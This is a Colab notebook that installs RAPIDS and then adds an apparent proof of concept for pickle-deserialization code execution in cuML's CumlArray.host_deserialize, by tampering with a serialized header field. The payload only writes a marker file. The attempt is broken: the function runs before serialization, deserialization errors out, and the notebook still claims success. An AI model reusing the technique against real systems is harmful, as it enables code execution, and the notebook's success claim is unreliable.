<a target="_blank" href="https://colab.research.google.com/github/rapidsai-community/showcase/blob/main/getting_started_tutorials/rapids-pip-colab-template.ipynb">
  <img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Install RAPIDS into Colab"/>
</a>

# RAPIDS cuDF is already on your Colab instance!
RAPIDS cuDF is preinstalled on Google Colab and instantly accelerates Pandas with zero code changes. [You can quickly get started with our tutorial notebook](https://nvda.ws/rapids-cudf). This notebook template is for users who want to utilize the full suite of the RAPIDS libraries for their workflows on Colab.  

# Environment Sanity Check #

Click the _Runtime_ dropdown at the top of the page, then _Change Runtime Type_ and confirm the instance type is _GPU_.

Run `!nvidia-smi` to see which GPU you have; uncomment the cell below to do that.  Currently, RAPIDS runs on all available Colab GPU instances.

In [2]:
# !nvidia-smi
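
As a Python alternative to the shell command above, the same check can be sketched with `subprocess`. This is a minimal sketch and not part of the RAPIDS install script: the helper name `gpu_summary` is hypothetical, and it assumes `nvidia-smi` is on the `PATH` whenever a GPU runtime is attached.

```python
import shutil
import subprocess


def gpu_summary():
    """Return one line per visible GPU, or None if nvidia-smi is unavailable.

    Hypothetical helper for illustration; not part of RAPIDS.
    """
    if shutil.which("nvidia-smi") is None:
        return None  # No NVIDIA driver tools found: likely a CPU-only runtime.
    result = subprocess.run(
        ["nvidia-smi", "--query-gpu=name,memory.total", "--format=csv,noheader"],
        capture_output=True,
        text=True,
        check=False,
    )
    if result.returncode != 0:
        return None  # nvidia-smi exists but could not query a GPU.
    return result.stdout.strip().splitlines()


gpus = gpu_summary()
print(gpus if gpus else "No GPU detected; change the runtime type to GPU.")
```

If this prints the fallback message, revisit the _Runtime_ settings before running the install cell.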

# Setup:
This setup script:

1. Checks that the GPU is RAPIDS compatible
1. Pip installs the RAPIDS libraries, which are:
  1. cuDF
  1. cuML
  1. cuGraph
  1. cuSpatial
  1. cuxFilter
  1. cuCIM
  1. xgboost

# Controlling Which RAPIDS Version is Installed
This line in the cell below, `!python rapidsai-csp-utils/colab/pip-install.py`, kicks off the RAPIDS installation script.  You can control which RAPIDS version is installed by appending `latest` or `nightlies`, or by leaving the option blank for the default.  Example:

`!python rapidsai-csp-utils/colab/pip-install.py <option>`

You can tell the script to install:
1. **RAPIDS + Colab default version**: leave the install script option blank (or give an invalid option). This adds the rest of the RAPIDS libraries to the RAPIDS cuDF library preinstalled on Colab.  **This is the default and recommended version.**  Example: `!python rapidsai-csp-utils/colab/pip-install.py`
1. **Latest known working RAPIDS stable version**: use the option `latest` to upgrade all RAPIDS libraries to the latest working RAPIDS stable version.  This is usually early access to future RAPIDS + Colab functionality; some functionality may not work, and it can be the same as the default version. Example: `!python rapidsai-csp-utils/colab/pip-install.py latest`
1. **Current nightlies version**: use the option `nightlies` to install the current RAPIDS nightlies version.  For RAPIDS developer use; **not recommended/untested**.  Example: `!python rapidsai-csp-utils/colab/pip-install.py nightlies`
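
The option handling described in the list above can be summarized in a few lines of Python. This is only an illustrative sketch: `install_command` is a hypothetical helper, not something shipped in `rapidsai-csp-utils`, and it simply mirrors the stated rule that a blank or unrecognized option means the default install.

```python
VALID_OPTIONS = ("latest", "nightlies")
SCRIPT = "rapidsai-csp-utils/colab/pip-install.py"


def install_command(option=""):
    """Build the install command line for a given option (hypothetical helper)."""
    option = option.strip()
    if option not in VALID_OPTIONS:
        # Per the notes above, a blank or invalid option selects the default install.
        return f"python {SCRIPT}"
    return f"python {SCRIPT} {option}"


for opt in ("", "latest", "nightlies", "typo"):
    print(repr(opt), "->", install_command(opt))
```

In a Colab cell, the resulting string would be run with a leading `!`.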


**This will complete in about 5-6 minutes**

In [3]:
# This gets the RAPIDS-Colab install files and checks your GPU.  Run this and the next cell only.
# Please read the output of this cell.  If your Colab instance is not RAPIDS compatible, it will warn you and give you remediation steps.
!git clone https://github.com/rapidsai/rapidsai-csp-utils.git
!python rapidsai-csp-utils/colab/pip-install.py


Cloning into 'rapidsai-csp-utils'...
remote: Enumerating objects: 525, done.
remote: Counting objects: 100% (256/256), done.
remote: Compressing objects: 100% (162/162), done.
remote: Total 525 (delta 168), reused 129 (delta 94), pack-reused 269 (from 1)
Receiving objects: 100% (525/525), 168.72 KiB | 8.03 MiB/s, done.
Resolving deltas: 100% (270/270), done.
Collecting pynvml
  Downloading pynvml-11.5.3-py3-none-any.whl.metadata (8.8 kB)
Downloading pynvml-11.5.3-py3-none-any.whl (53 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 53.1/53.1 kB 2.3 MB/s eta 0:00:00
Installing collected packages: pynvml
Successfully installed pynvml-11.5.3
Installing RAPIDS remaining 24.6.* libraries
Looking in indexes: https://pypi.org/simple, https://pypi.nvidia.com
Collecting cuml-cu12==24.6.*
  Downloading https://pypi.nvidia.com/cuml-cu12/cuml_cu12-24.6.1-cp310-cp310-manylinux_2_28_x86_64.whl (1207.9 MB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 GB 1.6 MB/s eta 0:00:00
Collec

# RAPIDS is now installed on Colab.  
You can copy your code into the cells below, or run them as they are to validate your RAPIDS installation and versions.  
# Enjoy!

In [None]:
import cudf
cudf.__version__

'24.04.01'

In [4]:
import cuml
cuml.__version__

'24.06.01'

In [None]:
import cugraph
cugraph.__version__

'24.04.00'

In [None]:
import cuspatial
cuspatial.__version__

'24.04.00'

In [None]:
import cuxfilter
cuxfilter.__version__

'24.04.01'
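
The per-library checks above can also be run in one pass. The following is a minimal sketch using only `importlib` from the standard library; `rapids_versions` is a hypothetical helper, and the import names `cucim` and `xgboost` are assumed from the library list in the setup section. Libraries that fail to import are reported as unavailable instead of raising.

```python
import importlib

# Import names for the libraries listed in the setup section.
RAPIDS_MODULES = ["cudf", "cuml", "cugraph", "cuspatial", "cuxfilter", "cucim", "xgboost"]


def rapids_versions(modules=RAPIDS_MODULES):
    """Map each module name to its __version__, or None if it cannot be imported."""
    versions = {}
    for name in modules:
        try:
            module = importlib.import_module(name)
        except Exception:  # ImportError, or a driver/runtime error raised at import time
            versions[name] = None
        else:
            versions[name] = getattr(module, "__version__", None)
    return versions


for name, version in rapids_versions().items():
    print(f"{name:10s} {version or 'not available'}")
```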

# Next Steps #

For an overview of how you can access and work with your own datasets in Colab, check out [this guide](https://towardsdatascience.com/3-ways-to-load-csv-files-into-colab-7c14fcbdcb92).

For more RAPIDS examples, check out our RAPIDS notebooks repos:
1. https://github.com/rapidsai/notebooks
2. https://github.com/rapidsai/notebooks-contrib

In [5]:
# Verify cuML installation
import cuml
from cuml.common import CumlArray
import numpy as np

# Create a simple CumlArray object to check if everything works
data = np.random.rand(100).astype(np.float32)
cuml_array = CumlArray(data=data)

print("cuML and CumlArray working correctly!")

cuML and CumlArray working correctly!


In [9]:
import pickle
import os
import numpy as np
from cuml.common import CumlArray

# Step 1: Define a function
def code():
    print("code executed!")
    os.system("echo 'code executed!' > /tmp/code_triggered")

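# Step 2: Serialize the payload
# Note: code() is called right here, so its side effects (the print and the
# file write) happen at this line; pickle.dumps() then serializes the return
# value of code(), which is None.
malicious_payload = pickle.dumps(code())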

# Step 3: Legitimately serialize the CumlArray (as would be done normally)
data = np.random.rand(100).astype(np.float32)
cuml_array = CumlArray(data=data)

header, frames = cuml_array.host_serialize()

# Step 4: Inject the payload into the serialized data
header['type-serialized'] = malicious_payload  # Replace the type-serialized field with the payload

# Step 5: Run deserialization on the tampered header
try:
    print("Attempting to trigger code via deserialization...")
    CumlArray.host_deserialize(header, frames)
except Exception as e:
    print(f"An error occurred: {e}")

# Step 6: Check whether /tmp/code_triggered exists. Because code() already ran
# in Step 2, the file exists regardless of what deserialization did.
if os.path.exists("/tmp/code_triggered"):
    print(" code successfully executed! File created at /tmp/code_triggered")
else:
    print(" code did not execute.")

code executed!
Attempting to trigger code via deserialization...
An error occurred: 'NoneType' object has no attribute 'deserialize'
 code successfully executed! File created at /tmp/code_triggered
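
The `'NoneType' object has no attribute 'deserialize'` error above is consistent with the payload being the pickled return value of `code()` and not a callable object. The standalone sketch below uses only the standard library and a hypothetical `side_effect` function to show what `pickle.dumps(f())` actually serializes. It assumes, without confirming it here, that `host_deserialize` unpickles the `type-serialized` field and then calls `.deserialize` on the result.

```python
import pickle

calls = []


def side_effect():
    """Stand-in for code() above: records that it ran and returns None."""
    calls.append("ran")


# The parentheses call the function immediately; only its return value is pickled.
payload = pickle.dumps(side_effect())
ran_before_load = list(calls)

restored = pickle.loads(payload)

print("ran before loads:", ran_before_load)
print("restored object:", restored)
print("calls after loads:", calls)
```

The function runs once, at serialization time, and unpickling yields `None`, so the file check in Step 6 cannot by itself attribute the side effect to deserialization.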


In [12]:
!ls -la /tmp

total 96
drwxrwxrwt 1 root root  4096 Oct 17 11:53 .
drwxr-xr-x 1 root root  4096 Oct 17 11:45 ..
-rw-r--r-- 1 root root    15 Oct 17 11:53 code_triggered
srwxr-xr-x 1 root root     0 Oct 17 11:45 colab_runtime.sock
-rw-r--r-- 1 root root  1334 Oct 17 11:45 dap_multiplexer.03deec361f37.root.log.INFO.20241017-114518.114
lrwxrwxrwx 1 root root    62 Oct 17 11:45 dap_multiplexer.INFO -> dap_multiplexer.03deec361f37.root.log.INFO.20241017-114518.114
srwxr-xr-x 1 root root     0 Oct 17 11:45 debugger_o1nqsjcnc
drwx------ 2 root root  4096 Oct 17 11:46 initgoogle_syslog_dir.0
-rw-r--r-- 1 root root 18279 Oct 17 11:50 language_service.03deec361f37.root.log.ERROR.20241017-115046.1553
-rw-r--r-- 1 root root  3159 Oct 17 11:48 language_service.03deec361f37.root.log.INFO.20241017-114628.457
-rw-r--r-- 1 root root  2062 Oct 17 11:50 language_service.03deec361f37.root.log.INFO.20241017-115031.1553
-rw-r--r-- 1 root root  6462 Oct 17 11:54 language_service.03deec361f37.root.log.INFO.20241017-115046.